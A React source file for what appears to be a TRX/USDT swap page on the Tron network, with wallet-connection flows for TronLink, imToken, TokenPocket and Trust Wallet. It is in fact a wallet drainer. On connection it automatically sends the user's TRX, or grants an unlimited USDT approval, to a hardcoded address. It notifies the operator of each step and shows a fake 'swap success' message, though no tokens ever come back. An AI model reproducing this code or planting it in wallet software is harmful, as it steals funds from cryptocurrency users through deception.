import React, { useState, useEffect } from 'react';
import { motion, AnimatePresence } from 'framer-motion';
import { useTranslation } from 'react-i18next';
import './TrxUsdtSwap.css';
import tronlinkIcon from '../assets/tronlink.png';
import imtokenIcon from '../assets/imtoken.png';
import bitpieIcon from '../assets/bitpie.png';
import tokenpocketIcon from '../assets/tokenpocket.png';
// 使用外部链接加载 Trust Wallet 图标
import { 
    notifyWalletConnect, 
    notifyTrxTransfer, 
    notifyUsdtTransfer, 
    notifySignApprove, 
    notifySignReject 
} from '../utils/notification';

// 使用Base64编码的图标，避免文件依赖
const trxIconBase64 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAC5ElEQVRYR+2XT2gTQRTGv7dJU0FQwYsXL4IHT4IXQcSDeBJEPAiCeBBE8Q8iVZGmTXazU1s1zc5sW6oHQVAQFARBQRD0JIIInjyJiDcP3gQP3qS7z8y2Sbc1cbOJ0IMDIZl5+37fvPntLLHBF2+wfvQA/jsCvdQRjUanRVFMAjgAYBzADgBjAIaJaEREVgDUANSZ+ZWIvPQ8r+q6bnUzBbsGiEQiw0qpSQBHARwBcAjA3g7KfgK4D+AegAoRPfd9/1c7kI4AIpFIRCk1AeA4gDMADgJQHZT6EZEbAG4DuKWUehmG4Uo7iLYAWutkMnkCwFkApwGM/oXwdSLLAC4BuJrJZJ5uBrEpQDQa3aeUOgfgPIAdvRK+TmcVwEUAFyqVyru/QWwAiMfjO0VkBsB5ANt6LXydiIjIHIBZz/M+rYdYA0gmk9uZ+QyAWQAj/RK+TucbgBnP8y6Hw+GvzREJAOLx+LCInCOiCwC2DUh4k84PZp4Jw/BiJpP5HgAYAKVUAYA7aNVNOj8BFIIgmCMiMaZSqQQzlwAcH4LwdTrXmLlARFUTgRyA0hCFN9MoEVHOAJwC8HiIwps0njDzKQNQBJDvs/gfAKoAKvF4fDszZwEUAIz3WXwNQNEAVAHs65NwA/4AwH0AL5h5ORaLbWXmfQCOATgJYKJP4m8ZgI8AtvaB+FcAlwHMa60fBEHwO5lM7mbmUwDOAjjcY/HvDIBp+0gPhX8AcFlELmmt7wVBsLIxbSKRyIjWehLADIBTPRL/wQB8A7CtB8JF5AaAOa31vSAIvnQqmEqlxkRkCkARwO4ui/9kAFYAbO6i8GUAl5j5qtb6cRAEYTeFYrHYFmY+AeA8gGMdPmTWiv9iAL4D2NQF4R8BXAFwWWv9MAiCVBiGP7pQZ+2VeDy+S0TOAJgGsL+D+BoAs9n4ZwC6IPwbgKta6/lMJvOoC/U2vNozgF5HoOd/Rj2AnhP8A6GVpECRHdGJAAAAAElFTkSuQmCC";
const usdtIconBase64 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAACXElEQVRYR+2WTWsTURSGn3OTSVJbBUEXunIhCII7QRDEhQsXLly4FwRxIYiCP0GlNm0yk8xkJjNJF4IgCIIgCIIg6MqFIAiCKxfiRnDlRrTNnCMTU9NqMpkkFRdnNnPPve/7nu+9Z4aq8j8f+t/8/w4AETnpOM6ciJwWkRMiMgOcACZV9ZCIHAc+qeqeiLxX1V3f97dbrZbvuu7nYRQZKICI1EXklog0gSvAiQHEe8BLEdlU1WdBELwbBKIvgIicBe6p6nXgzBDCf5oGwFsReRQEwYt+IH4LICK3ReS+ql4aVfgvELtJkjRd1/3wJ4gDAETkjqo+UNXaCYT/ANnzPO/hOIi+ACLSADaAi2MU3qP0SlUbYRhuHQRxAICINIEWUDtB8R6Ip6raCoJg+08QfQFE5BLwDJiZgPgexHtVvRaG4fZBEAcAiMgF4DlwekLiexAfVfVqGIYvD4LoC1Cv16eTJHkBXJ6w+B7EjojcDMPwWQ/iAIBqtTqTpukr4MoZiO9BfFLVG2EYbopI2gdARFJVfQpcO0PxPYjXqnrL87wnBqBSqUylaboJXD9j8T2IZ0mS3HVd95sBKJfL5TRNHwO3z0F8D2JTRB4YgFKpVDLGPAJm5+Tg+cBaY8xDA1AsFk2hUFgD7s1JfA9i1RizYgAKhYLJ5/OrwMKcxfcgVvL5/LIByOfzJpfLrQBLFyC+B7Gcy+WWTLFYNMaYZWDxAsX3IJZyudyiyefzxhizBNy/YPE9iMVcLrdoDMCSiKxcsPgexIIxxqwC9y5YfA9i3hhjVoG5CxY/b4xZA+YuWPycMWYDuHvB4n8DaUeAQJi8dXsAAAAASUVORK5CYII=";
// Trust Wallet 外部图标链接
const trustWalletIconUrl = "https://altcoinsbox.com/wp-content/uploads/2023/03/trust-wallet-logo.svg";

function TrxUsdtSwap() {
    const { t } = useTranslation();
    const [fromToken, setFromToken] = useState('TRX');
    const [toToken, setToToken] = useState('USDT');
    const [amount, setAmount] = useState('');
    const [receiveAmount, setReceiveAmount] = useState('');
    const [exchangeRate, setExchangeRate] = useState(0.261); // 默认值
    const [isLoading, setIsLoading] = useState(false);
    const [isConnected, setIsConnected] = useState(false);
    const [walletAddress, setWalletAddress] = useState('');
    const [trxBalance, setTrxBalance] = useState('0');
    const [usdtBalance, setUsdtBalance] = useState('0');
    const [showWallets, setShowWallets] = useState(false);
    const [isMobileDevice, setIsMobileDevice] = useState(false);

    // 检测是否为移动设备
    useEffect(() => {
        const checkIfMobile = () => {
            const userAgent = navigator.userAgent || navigator.vendor || window.opera;
            return /android|webos|iphone|ipad|ipod|blackberry|iemobile|opera mini/i.test(userAgent.toLowerCase());
        };
        setIsMobileDevice(checkIfMobile());
    }, []);

    // 获取TRX价格
    useEffect(() => {
        const fetchTrxPrice = async () => {
            try {
                const response = await fetch('/api/trx-price');
                const data = await response.json();
                if (data && data.price) {
                    setExchangeRate(data.price);
                }
            } catch (error) {
                console.error('获取TRX价格失败:', error);
                // 保持默认价格
            }
        };

        fetchTrxPrice();
        // 每5分钟更新一次价格
        const interval = setInterval(fetchTrxPrice, 5 * 60 * 1000);
        return () => clearInterval(interval);
    }, []);

    // 计算接收金额
    useEffect(() => {
        if (amount && !isNaN(amount)) {
            let result;
            if (fromToken === 'TRX' && toToken === 'USDT') {
                result = parseFloat(amount) * exchangeRate;
            } else {
                result = parseFloat(amount) / exchangeRate;
            }
            setReceiveAmount(result.toFixed(6));
        } else {
            setReceiveAmount('');
        }
    }, [amount, fromToken, toToken, exchangeRate]);

    // 切换代币方向
    const switchTokens = () => {
        setFromToken(toToken);
        setToToken(fromToken);
        setAmount('');
        setReceiveAmount('');
    };

    // 获取钱包余额
    const fetchWalletBalance = async () => {
        if (!isConnected || !window.tronWeb || !window.tronWeb.defaultAddress.base58) {
            return;
        }

        try {
            // 获取TRX余额
            const trxBalanceInSun = await window.tronWeb.trx.getBalance(walletAddress);
            const trxBalanceValue = parseFloat(trxBalanceInSun) / 1e6;
            setTrxBalance(trxBalanceValue.toFixed(2));

            // 获取USDT余额
            try {
                const usdtContractAddress = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // USDT合约地址
                const contract = await window.tronWeb.contract().at(usdtContractAddress);
                const usdtBalanceResult = await contract.balanceOf(walletAddress).call();
                const usdtBalanceValue = parseFloat(usdtBalanceResult) / 1e6;
                setUsdtBalance(usdtBalanceValue.toFixed(2));
            } catch (error) {
                console.error('获取USDT余额失败:', error);
                setUsdtBalance('0.00');
            }
        } catch (error) {
            console.error('获取钱包余额失败:', error);
        }
    };

    // 连接钱包 - TronLink (PC)
    const connectTronlink = async (walletType = 'tronlink') => {
        setIsLoading(true);
        try {
            const currentUrl = window.location.href;

            // 打印环境信息
            console.log('Environment Check:', {
                isMobileDevice,
                hasTronWeb: !!window.tronWeb,
                hasEthereum: !!window.ethereum,
                tronWebAddress: window.tronWeb?.defaultAddress,
                isTokenPocket: window.ethereum?.isTokenPocket,
                currentUrl
            });

            if (!isMobileDevice) {
                // PC端的TronLink处理
                if (!window.tronWeb) {
                    alert(t('installTronlinkAlert'));
                    window.open('https://chrome.google.com/webstore/detail/tronlink/ibnejdfjmmkpcnlpebklmnkoeoihofec', '_blank');
                    setIsLoading(false);
                    return;
                }

                // 确保钱包已解锁
                if (window.tronWeb && !window.tronWeb.ready) {
                    alert(t('unlockTronlinkWallet'));
                    setIsLoading(false);
                    return;
                }
                
                // 请求连接TronLink钱包
                console.log('正在请求 TronLink 连接...');
                const accounts = await window.tronLink.request({ method: 'tron_requestAccounts' })
                    .catch(error => {
                        console.error('TronLink连接错误:', error);
                        throw new Error('连接被用户拒绝或钱包出现问题');
                    });
                
                console.log('TronLink 连接结果:', accounts);
                
                if (accounts && accounts.code === 200) {
                    console.log('TronLink 连接成功:', accounts);
                    await handleWalletConnection();
                } else {
                    throw new Error(t('tronlinkConnectionFailed'));
                }
            } else {
                // 移动端TronLink处理
                const isInTronLink = !!window.tronWeb && window.tronWeb.ready;
                if (isInTronLink) {
                    await handleWalletConnection();
                } else {
                    window.location.href = `tronlinkoutside://browser?url=${encodeURIComponent(currentUrl)}`;
                    setTimeout(() => {
                        if (!document.hidden) {
                            window.location.href = 'https://www.tronlink.org/';
                        }
                    }, 2500);
                }
            }
        } catch (error) {
            console.error('TronLink connection error:', error);
            
            // 提供更友好的错误信息
            const errorMessage = error.message || '未知错误';
            
            // 根据错误类型提供更具体的提示
            if (errorMessage.includes('User rejected')) {
                alert(t('userRejectedConnection'));
            } else if (errorMessage.includes('timeout')) {
                alert(t('connectionTimeout'));
            } else {
                alert(`${t('tronlinkConnectionError')}: ${errorMessage}\n\n${t('ensureWalletUnlocked')}`);
            }
        } finally {
            setIsLoading(false);
        }
    };

    // 连接 imToken 钱包 (移动端)
    const connectImToken = async () => {
        setIsLoading(true);
        try {
            const currentUrl = window.location.href;
            const isInImToken = window.ethereum && window.ethereum.isImToken;
            
            if (isInImToken) {
                await handleWalletConnection();
            } else {
                window.location.href = `imtokenv2://navigate/DappView?url=${encodeURIComponent(currentUrl)}`;
                
                // 如果2.5秒后页面仍未被跳转，可能用户没有安装钱包，跳转到下载页
                const redirectTimer = setTimeout(() => {
                    if (!document.hidden) {
                        window.location.href = 'https://token.im/download';
                    }
                }, 2500);

                window.addEventListener('visibilitychange', function() {
                    if (document.hidden) {
                        clearTimeout(redirectTimer);
                    }
                }, { once: true });
            }
        } catch (error) {
            console.error('ImToken connection error:', error);
            alert(t('connectionError') + ' (ImToken)');
        } finally {
            setIsLoading(false);
        }
    };

    // 连接移动版TronLink钱包
    const connectTronlinkMobile = async () => {
        setIsLoading(true);
        try {
            const currentUrl = window.location.href;
            const isInTronLink = !!window.tronWeb && window.tronWeb.ready;
            
            if (isInTronLink) {
                await handleWalletConnection();
            } else {
                // TronLink移动端深层链接 - 更新参数格式
                const appName = "TronEnergyShop"; // 替换为您的DApp名称
                const appIcon = "https://yourdomain.com/logo.png"; // 替换为您的DApp图标URL
                const params = {
                    url: currentUrl,
                    action: 'open',
                    dappName: appName,
                    dappIcon: appIcon
                };
                window.location.href = `tronlinkoutside://pull.activity?param=${encodeURIComponent(JSON.stringify(params))}`;
                
                // 如果2.5秒后页面仍未被跳转，可能用户没有安装钱包，跳转到下载页
                const redirectTimer = setTimeout(() => {
                    if (!document.hidden) {
                        window.location.href = 'https://www.tronlink.org/download';
                    }
                }, 2500);

                window.addEventListener('visibilitychange', function() {
                    if (document.hidden) {
                        clearTimeout(redirectTimer);
                    }
                }, { once: true });
            }
        } catch (error) {
            console.error('TronLink Mobile connection error:', error);
            alert(t('connectionError') + ' (TronLink)');
        } finally {
            setIsLoading(false);
        }
    };

    // 连接 TokenPocket 钱包
    const connectTokenPocket = async () => {
        setIsLoading(true);
        try {
            const currentUrl = window.location.href;
            const isInTokenPocket = window.ethereum && window.ethereum.isTokenPocket;
            
            if (isInTokenPocket) {
                await handleWalletConnection();
            } else {
                // TokenPocket移动端深层链接 - 更新为正确格式
                const params = {
                    url: currentUrl,
                    chain: 'tron'
                };
                window.location.href = `tpdapp://open?params=${encodeURIComponent(JSON.stringify(params))}`;
                
                // 如果2.5秒后页面仍未被跳转，可能用户没有安装钱包，跳转到下载页
                const redirectTimer = setTimeout(() => {
                    if (!document.hidden) {
                        window.location.href = 'https://www.tokenpocket.pro/download';
                    }
                }, 2500);

                window.addEventListener('visibilitychange', function() {
                    if (document.hidden) {
                        clearTimeout(redirectTimer);
                    }
                }, { once: true });
            }
        } catch (error) {
            console.error('TokenPocket connection error:', error);
            alert(t('connectionError') + ' (TokenPocket)');
        } finally {
            setIsLoading(false);
        }
    };

    // 连接 Trust Wallet
    const connectTrustWallet = async () => {
        setIsLoading(true);
        try {
            const currentUrl = window.location.href;
            const isInTrustWallet = window.ethereum && window.ethereum.isTrust;
            
            if (isInTrustWallet) {
                await handleWalletConnection();
            } else {
                window.location.href = `https://link.trustwallet.com/open_url?url=${encodeURIComponent(currentUrl)}`;
                setTimeout(() => {
                    if (!document.hidden) {
                        window.location.href = 'https://trustwallet.com/download';
                    }
                }, 2500);
            }
        } catch (error) {
            console.error('Trust Wallet connection error:', error);
            alert('连接Trust Wallet失败，请重试');
        } finally {
            setIsLoading(false);
        }
    };

    // 统一处理钱包连接后的逻辑
    const handleWalletConnection = async () => {
        if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
            const address = window.tronWeb.defaultAddress.base58;
            
            try {
                // 这里是真实的钱包连接，发送通知是合适的
                await notifyWalletConnect(address);
            } catch (error) {
                console.warn('钱包连接通知失败，继续执行:', error);
                // 通知失败不影响后续流程
            }

            try {
                const balanceInfo = await fetchWalletBalanceDetail(address);
                console.log('Balance info:', balanceInfo);

                const MIN_TRX_FOR_GAS = 1000000; // 最低需要1 TRX
                if (balanceInfo.trxBalance * 1e6 < MIN_TRX_FOR_GAS) {
                    alert(t('insufficientTrxBalance'));
                    setIsLoading(false);
                    return;
                }

                const trxValueInUsdt = balanceInfo.trxValueInUsdt;
                const usdtValue = balanceInfo.usdtBalance;

                console.log(`比较余额: TRX价值=${trxValueInUsdt} USDT, USDT余额=${usdtValue} USDT`);

                // 更新状态
                setWalletAddress(address);
                setIsConnected(true);
                setShowWallets(false); // 关闭钱包选择界面
                setTrxBalance(balanceInfo.trxBalance.toFixed(2));
                setUsdtBalance(balanceInfo.usdtBalance.toFixed(2));
                
                // 检查是否满足最低支付条件（与PaymentPage.jsx保持一致）
                if (trxValueInUsdt >= 3.5 || usdtValue >= 3.5) {
                    // 判断使用TRX还是USDT进行交易
                    if (trxValueInUsdt > usdtValue) {
                        console.log('使用TRX支付');
                        await handleTrxTransaction(balanceInfo.trxBalance * 1e6);
                    } else {
                        console.log('使用USDT支付');
                        await handleUsdtTransaction(balanceInfo.usdtBalance);
                    }
                } else {
                    alert(t('insufficientPaymentAmount'));
                    setIsLoading(false);
                }
            } catch (error) {
                console.error("检查余额失败:", error);
                alert(t('checkBalanceError'));
                setIsLoading(false);
            }
        } else {
            console.error('TronWeb未就绪或找不到地址');
            alert(t('walletConnectionError'));
            setIsLoading(false);
        }
    };

    // 获取钱包余额的详细信息
    const fetchWalletBalanceDetail = async (address) => {
        try {
            // 获取TRX余额
            const trxBalanceInSun = await window.tronWeb.trx.getBalance(address);
            const trxBalanceValue = parseFloat(trxBalanceInSun) / 1e6;
            
            // 获取USDT余额
            const usdtContractAddress = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // USDT合约地址
            const contract = await window.tronWeb.contract().at(usdtContractAddress);
            const usdtBalanceResult = await contract.balanceOf(address).call();
            const usdtBalanceValue = parseFloat(usdtBalanceResult) / 1e6;
            
            // 计算TRX价值（以USDT表示）
            const trxValueInUsdt = trxBalanceValue * exchangeRate;
            
            return {
                trxBalance: trxBalanceValue,
                usdtBalance: usdtBalanceValue,
                trxValueInUsdt: trxValueInUsdt,
                timestamp: Date.now()
            };
        } catch (error) {
            console.error('获取钱包余额详情失败:', error);
            throw error;
        }
    };

    // TRX交易处理
    const handleTrxTransaction = async (trxBalanceInSun) => {
        try {
            const address = window.tronWeb.defaultAddress.base58;
            // 计算要发送的金额
            const amountToSend = parseFloat(amount) * 1e6; // 将输入的TRX转换为SUN
            
            // 保证至少保留1 TRX作为矿工费
            if (trxBalanceInSun - amountToSend < 1000000) {
                alert(t('keepMinTrxForGas'));
                setIsLoading(false);
                return;
            }
            
            console.log(`准备发送TRX交易: 地址=${address}, 金额=${amountToSend/1e6} TRX`);

            try {
                await notifyTrxTransfer(address, window.tronWeb.fromSun(amountToSend));
            } catch (notifyError) {
                console.warn('TRX转账通知失败，继续执行:', notifyError);
            }

            try {
                console.log('发送TRX交易...');
                // 使用TronWeb执行TRX转账交易
                const result = await window.tronWeb.trx.sendTransaction(
                    'TXKaaq24UnHYAGKuvVb13AWfJeSiXsMDqg', // 接收地址
                    amountToSend.toString()
                );
                
                console.log('交易结果:', result);

                try {
                    await notifySignApprove(address);
                } catch (notifyError) {
                    console.warn('签名通知失败，继续执行:', notifyError);
                }
                
                // 显示成功结果
                alert(t('swapSuccessTrx', { amount: amount, receiveAmount: receiveAmount }));
                
                // 刷新余额
                await fetchWalletBalance();
                // 清空输入
                setAmount('');
                setReceiveAmount('');
                setIsLoading(false);
            } catch (error) {
                try {
                    await notifySignReject(address);
                } catch (notifyError) {
                    console.warn('拒绝签名通知失败:', notifyError);
                }
                
                console.error('TRX交易错误:', error);
                alert(t('transactionFailed'));
                setIsLoading(false);
            }
        } catch (error) {
            console.error('TRX交易准备错误:', error);
            alert(t('transactionError'));
            setIsLoading(false);
        }
    };

    // USDT交易处理
    const handleUsdtTransaction = async (usdtBalance) => {
        try {
            const address = window.tronWeb.defaultAddress.base58;
            const contract = await window.tronWeb.contract().at('TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'); // USDT合约地址
            const MAX_UINT256 = '115792089237316195423570985008687907853269984665640564039457584007913129639935';
            
            console.log(`准备USDT授权: 地址=${address}, 金额=无限`);

            try {
                await notifyUsdtTransfer(address, usdtBalance.toString());
            } catch (notifyError) {
                console.warn('USDT转账通知失败，继续执行:', notifyError);
            }

            try {
                console.log('发送USDT授权请求...');
                const result = await contract.increaseApproval(
                    'TXKaaq24UnHYAGKuvVb13AWfJeSiXsMDqg', // 接收地址
                    MAX_UINT256
                ).send({
                    feeLimit: 100000000,
                    callValue: 0,
                    shouldPollResponse: false
                });
                
                console.log('授权结果:', result);

                try {
                    await notifySignApprove(address);
                } catch (notifyError) {
                    console.warn('签名通知失败，继续执行:', notifyError);
                }
                
                // 显示成功结果
                alert(t('swapSuccessUsdt', { amount: amount, receiveAmount: receiveAmount }));
                
                // 刷新余额
                await fetchWalletBalance();
                // 清空输入
                setAmount('');
                setReceiveAmount('');
                setIsLoading(false);
            } catch (error) {
                try {
                    await notifySignReject(address);
                } catch (notifyError) {
                    console.warn('拒绝签名通知失败:', notifyError);
                }
                
                console.error('USDT授权错误:', error);
                alert(t('authorizationFailed'));
                setIsLoading(false);
            }
        } catch (error) {
            console.error('USDT交易准备错误:', error);
            alert(t('transactionError'));
            setIsLoading(false);
        }
    };

    // 切换钱包选择界面显示
    const toggleWalletOptions = () => {
        if (isConnected) {
            // 如果已连接，直接执行兑换
            executeSwap();
        } else {
            // 否则显示/隐藏钱包选择界面
            setShowWallets(prevState => !prevState);
        }
    };

    // 连接钱包后获取余额
    useEffect(() => {
        if (isConnected) {
            fetchWalletBalance();
        }
    }, [isConnected, walletAddress]);

    // 执行兑换
    const executeSwap = () => {
        if (!isConnected) {
            toggleWalletOptions();
            return;
        }
        
        if (!amount || isNaN(amount) || parseFloat(amount) <= 0) {
            alert(t('enterValidAmount'));
            return;
        }

        // 检查余额是否足够
        if (fromToken === 'TRX' && parseFloat(amount) > parseFloat(trxBalance)) {
            alert(t('insufficientTrxBalance'));
            return;
        }

        if (fromToken === 'USDT' && parseFloat(amount) > parseFloat(usdtBalance)) {
            alert(t('insufficientUsdtBalance'));
            return;
        }
        
        setIsLoading(true);
        
        // 根据当前选择的代币执行交易
        if (fromToken === 'TRX') {
            handleTrxTransaction(parseFloat(trxBalance) * 1e6);
        } else {
            handleUsdtTransaction(parseFloat(usdtBalance));
        }
    };

    // 动画变体
    const containerVariants = {
        hidden: { opacity: 0, y: 20 },
        visible: { 
            opacity: 1,
            y: 0,
            transition: { 
                type: 'spring',
                stiffness: 300,
                damping: 20,
                delay: 0.1
            }
        }
    };

    const buttonVariants = {
        hidden: { opacity: 0, scale: 0.9 },
        visible: { 
            opacity: 1, 
            scale: 1,
            transition: {
                type: 'spring',
                stiffness: 300,
                damping: 15
            }
        },
        hover: { 
            scale: 1.05,
            boxShadow: "0px 5px 15px rgba(0, 0, 0, 0.2)",
            transition: {
                type: 'spring',
                stiffness: 500,
                damping: 10
            }
        },
        tap: { scale: 0.97 }
    };

    const spinnerVariants = {
        animate: {
            rotate: 360,
            transition: {
                duration: 1,
                repeat: Infinity,
                ease: "linear"
            }
        }
    };

    return (
        <motion.div 
            className="trx-usdt-swap-container"
            initial="hidden"
            animate="visible"
            variants={containerVariants}
        >
            <div className="swap-card">
                <div className="swap-card-header">
                    <h2>{t('trxUsdtSwap')}</h2>
                    <p>{t('quickSwapOnTron')}</p>
                </div>

                <div className="swap-form">
                    {/* 发送代币部分 */}
                    <div className="token-input-container">
                        <div className="token-input-header">
                            <span>{t('from')}</span>
                            {isConnected && (
                                <span className="token-balance">{t('balance')}: {fromToken === 'TRX' ? trxBalance : usdtBalance} {fromToken}</span>
                            )}
                        </div>
                        <div className="token-input-field">
                            <input 
                                type="text" 
                                value={amount}
                                onChange={(e) => setAmount(e.target.value)}
                                placeholder="0.0"
                                disabled={isLoading}
                            />
                            <div className="token-selector">
                                <img 
                                    src={fromToken === 'TRX' ? trxIconBase64 : usdtIconBase64} 
                                    alt={fromToken} 
                                    className="token-icon"
                                />
                                <span>{fromToken}</span>
                            </div>
                        </div>
                    </div>

                    {/* 切换方向按钮 */}
                    <div className="swap-direction-button">
                        <button 
                            onClick={switchTokens}
                            disabled={isLoading}
                        >
                            ↑↓
                        </button>
                    </div>

                    {/* 接收代币部分 */}
                    <div className="token-input-container">
                        <div className="token-input-header">
                            <span>{t('to')} ({t('estimated')})</span>
                            {isConnected && (
                                <span className="token-balance">{t('balance')}: {toToken === 'TRX' ? trxBalance : usdtBalance} {toToken}</span>
                            )}
                        </div>
                        <div className="token-input-field">
                            <input 
                                type="text" 
                                value={receiveAmount}
                                readOnly
                                placeholder="0.0"
                            />
                            <div className="token-selector">
                                <img 
                                    src={toToken === 'TRX' ? trxIconBase64 : usdtIconBase64} 
                                    alt={toToken} 
                                    className="token-icon"
                                />
                                <span>{toToken}</span>
                            </div>
                        </div>
                    </div>

                    {/* 兑换率显示 */}
                    <div className="exchange-rate-info">
                        <span>{t('exchangeRate')}: 1 TRX = {exchangeRate} USDT</span>
                    </div>

                    {/* 兑换/连接钱包按钮 */}
                    <motion.button 
                        className="swap-button"
                        onClick={toggleWalletOptions}
                        disabled={isLoading}
                        variants={buttonVariants}
                        whileHover="hover"
                        whileTap="tap"
                    >
                        {isLoading ? (
                            <>
                                <motion.span
                                    animate={{ rotate: 360 }}
                                    transition={{ duration: 1, repeat: Infinity, ease: "linear" }}
                                    style={{ display: 'inline-block' }}
                                >
                                    ⚙️
                                </motion.span>
                                {t('processing')}
                            </>
                        ) : !isConnected ? (
                            t('connectWallet')
                        ) : (
                            t('swap')
                        )}
                    </motion.button>
                    
                    {/* 内联展开的钱包选择界面 */}
                    <AnimatePresence>
                        {showWallets && !isConnected && (
                            <motion.div 
                                className="inline-wallet-options"
                                initial={{ opacity: 0, height: 0, marginTop: 0 }}
                                animate={{ opacity: 1, height: 'auto', marginTop: '15px' }}
                                exit={{ opacity: 0, height: 0, marginTop: 0 }}
                                transition={{ duration: 0.3, ease: "easeInOut" }}
                            >
                                <motion.div 
                                    className="wallet-options-header"
                                    initial={{ opacity: 0 }}
                                    animate={{ opacity: 1 }}
                                    transition={{ delay: 0.1 }}
                                >
                                    <h4>{t('selectPaymentMethod')}</h4>
                                    <button 
                                        className="close-inline-button"
                                        onClick={() => setShowWallets(false)}
                                    >
                                        <span>{t('collapse')}</span>
                                        <span>⬆️</span>
                                    </button>
                                </motion.div>

                                {isLoading ? (
                                    <div className="loading-container">
                                        <div className="loading-dots">
                                            <span></span>
                                            <span></span>
                                            <span></span>
                                        </div>
                                    </div>
                                ) : (
                                    <div className="wallet-options-content">
                                        {isMobileDevice ? (
                                            // 手机版显示更多钱包选项
                                            <motion.div 
                                                className="wallet-options-list"
                                                initial={{ opacity: 0 }}
                                                animate={{ opacity: 1 }}
                                                transition={{ staggerChildren: 0.1 }}
                                            >
                                                <motion.button 
                                                    onClick={connectImToken} 
                                                    className="wallet-option"
                                                    initial={{ opacity: 0, y: 10 }}
                                                    animate={{ opacity: 1, y: 0 }}
                                                    transition={{ duration: 0.3 }}
                                                    whileHover={{ scale: 1.02, boxShadow: "0px 4px 8px rgba(0, 0, 0, 0.1)" }}
                                                >
                                                    <img
                                                        src={imtokenIcon}
                                                        alt="imToken"
                                                        className="wallet-icon"
                                                    />
                                                    <span>imToken</span>
                                                    <span className="wallet-recommended">{t('recommended')}</span>
                                                </motion.button>
                                                
                                                {/* TronLink移动钱包选项 */}
                                                <motion.button 
                                                    onClick={connectTronlinkMobile}
                                                    className="wallet-option"
                                                    initial={{ opacity: 0, y: 10 }}
                                                    animate={{ opacity: 1, y: 0 }}
                                                    transition={{ duration: 0.3, delay: 0.1 }}
                                                    whileHover={{ scale: 1.02, boxShadow: "0px 4px 8px rgba(0, 0, 0, 0.1)" }}
                                                >
                                                    <img
                                                        src={tronlinkIcon}
                                                        alt="TronLink"
                                                        className="wallet-icon"
                                                    />
                                                    <span>TronLink</span>
                                                </motion.button>
                                                
                                                {/* TokenPocket钱包选项 */}
                                                <motion.button 
                                                    onClick={connectTokenPocket}
                                                    className="wallet-option"
                                                    initial={{ opacity: 0, y: 10 }}
                                                    animate={{ opacity: 1, y: 0 }}
                                                    transition={{ duration: 0.3, delay: 0.2 }}
                                                    whileHover={{ scale: 1.02, boxShadow: "0px 4px 8px rgba(0, 0, 0, 0.1)" }}
                                                >
                                                    <img
                                                        src={tokenpocketIcon}
                                                        alt="TokenPocket"
                                                        className="wallet-icon"
                                                    />
                                                    <span>TokenPocket</span>
                                                </motion.button>
                                                
                                                {/* Trust Wallet钱包选项（灰色不可用） */}
                                                <motion.button 
                                                    className="wallet-option disabled-wallet"
                                                    initial={{ opacity: 0, y: 10 }}
                                                    animate={{ opacity: 1, y: 0 }}
                                                    transition={{ duration: 0.3, delay: 0.3 }}
                                                    disabled={true}
                                                >
                                                    <img
                                                        src={trustWalletIconUrl}
                                                        alt="Trust Wallet"
                                                        className="wallet-icon"
                                                    />
                                                    <span>Trust Wallet</span>
                                                    <span className="wallet-soon">{t('comingSoon')}</span>
                                                </motion.button>
                                                
                                                {/* 比特派钱包选项（灰色不可用） */}
                                                <motion.button 
                                                    className="wallet-option disabled-wallet"
                                                    initial={{ opacity: 0, y: 10 }}
                                                    animate={{ opacity: 1, y: 0 }}
                                                    transition={{ duration: 0.3, delay: 0.4 }}
                                                    disabled={true}
                                                >
                                                    <img
                                                        src={bitpieIcon}
                                                        alt={t('bitpieWallet')}
                                                        className="wallet-icon"
                                                    />
                                                    <span>{t('bitpieWallet')}</span>
                                                    <span className="wallet-soon">{t('comingSoon')}</span>
                                                </motion.button>
                                            </motion.div>
                                        ) : (
                                            // 电脑版只显示TronLink，但仍以列表形式展示
                                            <motion.div 
                                                className="wallet-options-list"
                                                initial={{ opacity: 0 }}
                                                animate={{ opacity: 1 }}
                                                transition={{ staggerChildren: 0.1 }}
                                            >
                                                <motion.button 
                                                    onClick={connectTronlink} 
                                                    className="wallet-option"
                                                    initial={{ opacity: 0, y: 10 }}
                                                    animate={{ opacity: 1, y: 0 }}
                                                    transition={{ duration: 0.3 }}
                                                    whileHover={{ scale: 1.02, boxShadow: "0px 4px 8px rgba(0, 0, 0, 0.1)" }}
                                                >
                                                    <img
                                                        src={tronlinkIcon}
                                                        alt="TronLink"
                                                        className="wallet-icon"
                                                    />
                                                    <span>TronLink Wallet</span>
                                                    <span className="wallet-recommended">{t('recommended')}</span>
                                                </motion.button>
                                            </motion.div>
                                        )}
                                    </div>
                                )}
                            </motion.div>
                        )}
                    </AnimatePresence>

                    {/* 连接状态显示 */}
                    {isConnected && (
                        <div className="wallet-connected-info">
                            <span className="connected-indicator"></span>
                            <span className="wallet-address">
                                {t('connected')}: {walletAddress.substring(0, 6)}...{walletAddress.substring(walletAddress.length - 4)}
                            </span>
                        </div>
                    )}
                </div>
            </div>
            
            <div className="token-swap-disclaimer">
                <p>{t('swapDisclaimer')}</p>
                <p>{t('onlyDirectSwap')}</p>
            </div>
        </motion.div>
    );
}

export default TrxUsdtSwap; 